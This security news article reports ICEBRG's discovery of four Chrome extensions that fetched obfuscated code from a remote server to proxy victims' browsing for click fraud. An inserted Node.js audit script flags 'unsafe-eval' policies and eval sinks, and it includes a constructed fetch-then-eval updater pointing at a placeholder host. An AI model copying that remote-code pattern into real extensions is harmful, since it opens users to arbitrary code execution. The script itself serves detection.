Four malicious Chrome extensions managed to infect over half a million users worldwide, including employees of major organizations, ICEBRG reports.
The extensions were likely used to conduct click fraud and/or search engine optimization (SEO) manipulation, but they could have also been used by threat actors to gain access to corporate networks and user information, the security company warns.
The malicious extensions were discovered after observing an unusual spike in outbound traffic volume from a customer workstation to a European VPS provider, ICEBRG reveals. The HTTP traffic was associated with the domain ‘change-request[.]info’ and was generated from a Chrome extension named Change HTTP Request Header.
While the extension itself does not contain “any overtly malicious code,” the researchers discovered a combination of “two items of concern” that could result in the injection and execution of arbitrary JavaScript code via the extension.
Chrome can execute JavaScript code contained within JSON, but, for security reasons, extensions are not allowed to retrieve JSON from an external source unless they explicitly request that capability via their Content Security Policy (CSP).
Once that permission is enabled, however, the extension can retrieve and process JSON from an externally controlled server, which allows the extension’s authors to inject and execute arbitrary JavaScript code at the moment the update server receives a request.
What ICEBRG researchers discovered was that the Change HTTP Request Header extension could download obfuscated JSON files from ‘change-request[.]info’, via an ‘update_presets()’ function. The obfuscated code was observed checking for native Chrome debugging tools and halting the execution of the infected segment if such tools were detected.
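As an added illustration (not code from ICEBRG, from the extension, or from Google), the following Node.js script audits an extension manifest for the CSP opt-in described above and scans extension source for the eval-style sinks that turn fetched JSON into running code. The manifest, the body of update_presets() and the update domain are constructed for the example.

```javascript
// Added example: manifest CSP audit plus dynamic-code sink scan for a Chrome extension.

function parseCsp(csp) {
  // "script-src 'self' 'unsafe-eval'; object-src 'self'" -> { "script-src": [...], ... }
  const directives = {};
  for (const part of csp.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

function auditManifestCsp(manifest) {
  // Manifest V2 carries a CSP string; Manifest V3 carries an object (extension_pages).
  const raw = manifest.content_security_policy;
  const csp = typeof raw === "string" ? raw : (raw && raw.extension_pages) || "";
  const findings = [];
  if (!csp) return findings; // no override: Chrome's default extension CSP (no eval)
  const scriptSrc = parseCsp(csp)["script-src"] || [];
  const remote = scriptSrc.filter((s) => /^(https?:|wss?:|\*)/i.test(s));
  if (scriptSrc.includes("'unsafe-eval'")) findings.push("script-src allows 'unsafe-eval': fetched strings can be executed");
  if (remote.length) findings.push("script-src allows remote script origins: " + remote.join(" "));
  return findings;
}

function findEvalSinks(source) {
  // Sinks that execute a string: eval(), new Function(), string-argument timers.
  const sinks = [/\beval\s*\(/g, /\bnew\s+Function\s*\(/g, /\bset(?:Timeout|Interval)\s*\(\s*["'`]/g];
  return sinks.flatMap((re) => (source.match(re) || []).map((m) => m.trim()));
}

// Constructed sample: a V2 manifest that opts into eval, and a fetch-then-eval updater.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'",
};
const SAMPLE_SOURCE = `
function update_presets() {            // constructed body, not the real extension's code
  fetch("https://updates.example.invalid/presets.json")   // placeholder update server
    .then(r => r.text())
    .then(body => eval(body));        // the fetched "JSON" runs as JavaScript
}`;

function auditExtension(manifest, source) {
  return { csp: auditManifestCsp(manifest), sinks: findEvalSinks(source) };
}

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCE), null, 2));
```

A manifest with no CSP override yields no findings because Chrome's default extension policy already refuses eval; the combination of an 'unsafe-eval' opt-in and an eval sink on fetched data is the pattern worth escalating.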
After injection, the malicious JavaScript creates a WebSocket tunnel with ‘change-request[.]info’ and uses it to proxy browsing traffic via the victim’s browser.
“During the time of observation, the threat actor utilized this capability exclusively for visiting advertising related domains indicating a potential click fraud campaign was ongoing. Click fraud campaigns enable a malicious party to earn revenue by forcing victim systems to visit advertising sites that pay per click (PPC),” ICEBRG reports.
The capability, however, can also be used by the threat actor to browse internal sites of victim networks, thus effectively bypassing perimeter controls.
The security researchers also discovered that Change HTTP Request Header wasn’t the only Chrome extension designed to work in this manner. Nyoogle – Custom Logo for Google, Lite Bookmarks, and Stickies – Chrome’s Post-it Notes show similar tactics, techniques, and procedures (TTPs) and feature the same command and control (C&C).
The Stickies extension was also observed using a different code injection pathway, but injecting JavaScript code nearly identical to that of other malicious extensions. It appears that the extension has a history of malicious behavior, as it was observed in early 2017 to be using the new code injection technique following an update.
“The inherent trust of third-party Google extensions, and accepted risk of user control over these extensions, allowed an expansive fraud campaign to succeed. In the hands of a sophisticated threat actor, the same tool and technique could have enabled a beachhead into target networks,” ICEBRG notes.
Considering the total installed user base of these malicious Chrome extensions, the malicious actor behind them has a substantial pool of resources to use for financial gain. Google, the National Cyber Security Centre of The Netherlands (NCSC-NL), the United States Computer Emergency Readiness Team (US-CERT), and customers who were directly impacted have been alerted to the issue.